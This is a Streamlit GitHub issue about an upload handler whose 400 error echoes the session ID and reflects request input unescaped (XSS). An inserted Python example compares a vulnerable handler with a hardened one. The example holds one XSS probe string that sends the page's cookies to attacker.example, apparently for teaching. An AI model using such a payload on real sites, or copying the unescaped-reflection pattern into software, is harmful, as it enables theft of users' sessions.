
When "upload_file_request_handler.py" returns 400 error, we can see session ID. #2803

Closed
450ryousuke opened this issue Feb 17, 2021 · 3 comments · Fixed by #7267
Labels
area:deployment Related to deploying Streamlit apps feature:st.file_uploader priority:P2 type:bug Something isn't working

Comments

@450ryousuke

Summary

We built an application on Microsoft Azure App Service with Streamlit.
When we tested uploading a file with st.file_uploader, it returned a 400 error with the session ID as a string.
We checked your code and noticed that when we get a 400 error, streamlit/lib/streamlit/server/upload_file_request_handler.py returns error code 400, the reason, and the session ID on lines 126-128.
This problem may lead to security incidents like XSS.
Please check it.

Steps to reproduce

Code snippet:

import streamlit as st

# Uploader restricted to .xlsx; the widget key is what the upload endpoint checks.
uploaded_file = st.file_uploader("uploading Excel files", type="xlsx", key="xlsx_up")
if uploaded_file is not None:
    st.write("Success")

Details of how the error occurred cannot be provided due to confidentiality.

Expected behavior:

When we get a 400 error, Streamlit will return only the error code and the error reason, without the session ID.

Actual behavior:

When we get a 400 error, Streamlit returns the error code and the error reason together with the session ID.
Screenshots cannot be uploaded due to confidentiality.

Is this a regression?

That is, did this use to work the way you expected in the past?
yes / no
⇒no

Debug info

  • Streamlit version: (get it with $ streamlit version)
    ⇒0.74.1
  • Python version: (get it with $ python --version)
    ⇒3.7
  • Using Conda? PipEnv? PyEnv? Pex?
    ⇒Pip
  • OS version:
    ⇒Linux
  • Browser version:
    ⇒Chrome 88.0.4324.150
@450ryousuke 450ryousuke added type:bug Something isn't working status:needs-triage Has not been triaged by the Streamlit team labels Feb 17, 2021
@karriebear
Contributor

Thanks for raising this!

In the ideal world we should only be returning that error if a session ID is invalid, in which case it should not matter what the session_id is, since it should not be usable for any connection with the server. We should definitely pull the widget_id out of the check and separate that so that we are not potentially exposing a valid session_id. Once that is done, I think it should be fine showing an invalid session_id, but would love to get your thoughts!

@450ryousuke
Author

Thank you for your comment.
We understand what you think about this issue.

We got a capture that shows the problem.
We sent a POST message to our upload function (Streamlit on Azure App Service) with an invalid session ID and a script to get the cookie.
The application returned the original invalid session ID and the script without escaping.
This script could be used to attack the application or obtain information from the system.
I think Streamlit should escape invalid scripts to avoid attacks.

Thank you for your consideration.

[Attached image: POST_image]
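The two problems raised in this thread, a combined session_id/widget_id check that can echo a valid session ID when only the widget ID is wrong (the maintainer's point), and request-controlled text reflected unescaped into the 400 response (the reporter's capture), are modelled below in a small added example. This is not Streamlit's handler or Tornado code; the state (KNOWN_SESSIONS, KNOWN_WIDGETS), the session-id format, the ErrorResponse stand-in and the XSS_PROBE string are all constructed for illustration.

```python
import html
import re
from dataclasses import dataclass
from typing import Optional

# Constructed server-side state for this example (not Streamlit's): the only
# session and the only file_uploader widget the hypothetical server knows about.
KNOWN_SESSIONS = {"3f2c9d6e1b0a4c8e9f6b2a1d5e7c8b90"}
KNOWN_WIDGETS = {"xlsx_up"}

# Assumed session-id format: 32 lowercase hex characters. Anything else is
# rejected before it can be compared, echoed or logged.
SESSION_ID_RE = re.compile(r"^[0-9a-f]{32}$")

# Constructed probe modelled on the reporter's description: a "session id" that
# is really a cookie-stealing script. It is only a string here and never runs.
XSS_PROBE = "<script>new Image().src='//attacker.example/?c='+document.cookie</script>"


@dataclass
class ErrorResponse:
    """Stand-in for an HTTP error: status code, status-line reason, HTML body."""
    status: int
    reason: str
    body: str


def _page(text: str) -> str:
    """Minimal HTML error page; `text` must already be safe for HTML."""
    return f"<html><title>{text}</title><body>{text}</body></html>"


def vulnerable_upload_check(session_id: str, widget_id: str) -> Optional[ErrorResponse]:
    """The pattern the issue describes: one combined check, and both
    request-controlled identifiers interpolated verbatim into the reason.
    Returns None when the upload would be accepted."""
    if session_id not in KNOWN_SESSIONS or widget_id not in KNOWN_WIDGETS:
        reason = f"Invalid session_id: '{session_id}' or widget_id: '{widget_id}'"
        return ErrorResponse(400, reason, _page(f"400: {reason}"))
    return None


def hardened_upload_check(session_id: str, widget_id: str) -> Optional[ErrorResponse]:
    """Validate the session id's shape first, check the two identifiers
    separately, keep the status-line reason constant, and HTML-escape the one
    request value that is worth reporting."""
    if not SESSION_ID_RE.fullmatch(session_id):
        return ErrorResponse(400, "Bad Request", _page("400: malformed session_id"))
    if session_id not in KNOWN_SESSIONS:
        # Unknown id: say so, but do not repeat it back.
        return ErrorResponse(400, "Bad Request", _page("400: unknown session_id"))
    if widget_id not in KNOWN_WIDGETS:
        # The session is valid at this point, so it must not appear in the
        # error; the widget id may, but only after escaping.
        return ErrorResponse(
            400, "Bad Request", _page(f"400: unknown widget_id '{html.escape(widget_id)}'")
        )
    return None


def reflects_verbatim(resp: Optional[ErrorResponse], needle: str) -> bool:
    """Check a response the way the reporter's capture was read: does the
    request-supplied value come back unescaped in the reason or the body?"""
    return resp is not None and (needle in resp.reason or needle in resp.body)


if __name__ == "__main__":
    valid = next(iter(KNOWN_SESSIONS))
    for name, check in (("vulnerable", vulnerable_upload_check), ("hardened", hardened_upload_check)):
        print(name, "reflects <script>:", reflects_verbatim(check(XSS_PROBE, "xlsx_up"), "<script>"))
        print(name, "leaks valid session id on bad widget:", reflects_verbatim(check(valid, "nope"), valid))
```

The reason phrase in the hardened version is a constant because the HTTP status line is not HTML: escaping does nothing there, and the only safe content is text the server chose itself. Anything request-controlled that really has to be reported belongs in the body, escaped, and a valid session ID never belongs in any error at all.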

@nthmost nthmost removed the status:needs-triage Has not been triaged by the Streamlit team label Feb 19, 2021
@cthurston

cthurston commented Oct 20, 2021

Deployed a docker container to a Kubernetes cluster and I'm hitting this error as well. It seems to work every other time. Any workarounds?
